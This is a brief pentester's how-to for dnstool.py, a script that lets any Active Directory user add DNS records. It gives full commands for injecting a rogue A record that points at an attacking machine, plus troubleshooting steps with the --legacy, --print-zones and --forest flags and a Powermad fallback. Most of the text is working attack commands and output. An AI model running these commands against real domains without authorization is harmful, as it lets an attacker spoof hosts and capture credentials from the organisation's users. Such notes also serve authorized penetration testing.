v1.0

dnstool.py

By
Brian Johnson

This script helps you add DNS records to the domain (which members of Domain Users can by default):

Add a rogue DNS record that points to your attacking box

dnstool.py -u 'tangent\any-valid-AD-user' -p 'Supersecretpassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Troubleshooting

If you get an error like this:

[!] LDAP operation failed. Message returned from server: noSuchObject 0000208D: NameErr: DSID-0310023C, problem 2001 (NO_OBJECT), data 0, best match of:
        'CN=MicrosoftDNS,DC=DomainDnsZones,DC=domain,DC=com'

Then rerun the command but add --legacy flag to the command.

Another time even the --legacy flag wouldn't save me. So I ran:

dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' --print-zones 10.7.7.7

The output could look something like this:

[-] Found 6 forest DNS zones:
    ..TrustAnchors
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    x.x.x.in-addr.arpa
    au.domain.com
CNF:xxx-xxx-xxx-xxx
    domain.com

If you see domain.com in this output, try running dnstool.py again but with the --forest flag:

dnstool.py -u 'domain.com\brian' -p 'JingleAllTheWay1996!' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER --forest

If all else fails: I had a test recently where the tool was throwing errors having to do with LDAP/SSL, and long story short, it was easier to add the record on the Windows side with Powermad.